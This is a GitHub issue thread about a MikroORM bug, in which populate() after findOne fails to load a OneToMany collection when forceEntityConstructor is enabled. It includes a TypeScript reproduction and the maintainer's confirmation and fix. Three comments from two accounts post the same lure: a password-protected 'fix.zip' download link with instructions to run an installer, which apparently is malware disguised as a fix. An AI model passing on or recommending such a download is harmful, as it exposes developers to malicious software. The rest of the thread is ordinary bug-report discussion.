### ISSUE TITLE
populate after find does not work with forced entity constructors

### ISSUE THREAD

**Issue by bdeutsch-heise** [mikro-orm/mikro-orm#5972]
### Describe the bug

This appears to be a regression of #2406 , or a shortcoming of the documentation.

Given two entities joined by a many-two-one relationship, modeled as a `new Collection<…>(this)` as per the docs, and `forceEntityConstructor: true`: a `populate` *after a find* fails to actually populate the field. Using the field as a populate hint for the `find` works.

Enclosed is a minimal single-file reproduction (needs only TypeScript and MikroORM with SQLite), showing the behavior with in-find and post-find `populate`. Comment out the `forceEntityConstructor` line to verify that the behaviors are identical without entity constructors.

### Reproduction

```
import {
  MikroORM,
  Entity,
  PrimaryKey,
  Collection,
  OneToMany,
  ManyToOne,
  BaseEntity,
} from "@mikro-orm/sqlite"

@Entity()
class User {
  @PrimaryKey({ type: "number" })
  id!: number

  // Note the OneToOne relationship with inverse
  @OneToMany({ type: "Article", mappedBy: "author" })
  articles = new Collection<Article>(this)
  // the following declaration would work, but is not documented this way
  // articles = new Collection<Article>(this, undefined, false)
}

@Entity()
export class Article extends BaseEntity {
  @PrimaryKey({ type: "number" })
  id!: number

  @ManyToOne({ type: "User" })
  author!: User
}

const orm = await MikroORM.init({
  entities: [Article, User],
  dbName: `:memory:`,
  // removing this line or choosing 'false' would allow the populate() to work
  forceEntityConstructor: true,
  allowGlobalContext: true, // should be fine here
})

async function main() {
  await orm.schema.createSchema()
  const author = orm.em.create(User, {
    id: 1,
  })
  orm.em.create(Article, {
    id: 1,
    author,
  })

  await orm.em.flush()
  orm.em.clear()

  const user1 = await orm.em.findOne(
    User,
    { id: 1 },
    { populate: ["articles"] }
  )
  // this contains an `articles` collection with one Article
  console.log(user1)

  orm.em.clear()
  const user2 = await orm.em.findOne(User, { id: 1 })
  if (user2) {
    await orm.em.populate(user2, ["articles"])
    // does not work either:
    // await user2.articles.loadItems()
  }
  // this contains an empty `articles` collection /!\
  console.log(user2)

  orm.close()
}

await main()
```

### What driver are you using?

@mikro-orm/sqlite

### MikroORM version

@mikro-orm/core@6.3.6 @mikro-orm/sqlite@6.3.6

### Node.js version

node --version v20.9.0 ,  typescript@5.5.4

### Validations

- [X] Read the [Contributing Guidelines](https://github.com/mikro-orm/mikro-orm/blob/master/CONTRIBUTING.md).
- [X] Read the [docs](https://mikro-orm.io/docs).
- [X] Check that there isn't [already an issue](https://github.com/mikro-orm/mikro-orm/issues) that reports the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A open a [GitHub Discussion](https://github.com/mikro-orm/mikro-orm/discussions) or join our [Discord](https://discord.gg/w8bjxFHS7X).
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bdeutsch-heise** [comment]
The workaround mentioned in https://github.com/mikro-orm/mikro-orm/issues/2406#issuecomment-966658342 does work, but the author of that comment makes vague and worrying allusions to "a whole can of worms"…

**Comment by B4nan** [comment]
It's not exactly a regression, the fix worked only for the `forceConstructor` option on entity level, not for the global `forceEntityConstructor` flag. The test case for #2406 fails when I swap to the global flag too.

**Comment by B4nan** [comment]
Ok it is a regression, the test used to be using `forceEntityConstructor`, but got changed with the introduction of the entity level option. Which probably never worked, lol.

**Comment by B4nan** [comment]
ended up fixing two other things that this uncovered 🙃 thanks for the report

**Comment by bdeutsch-heise** [comment]
Thanks for the fix; I can confirm it works with my minimal test case at least.
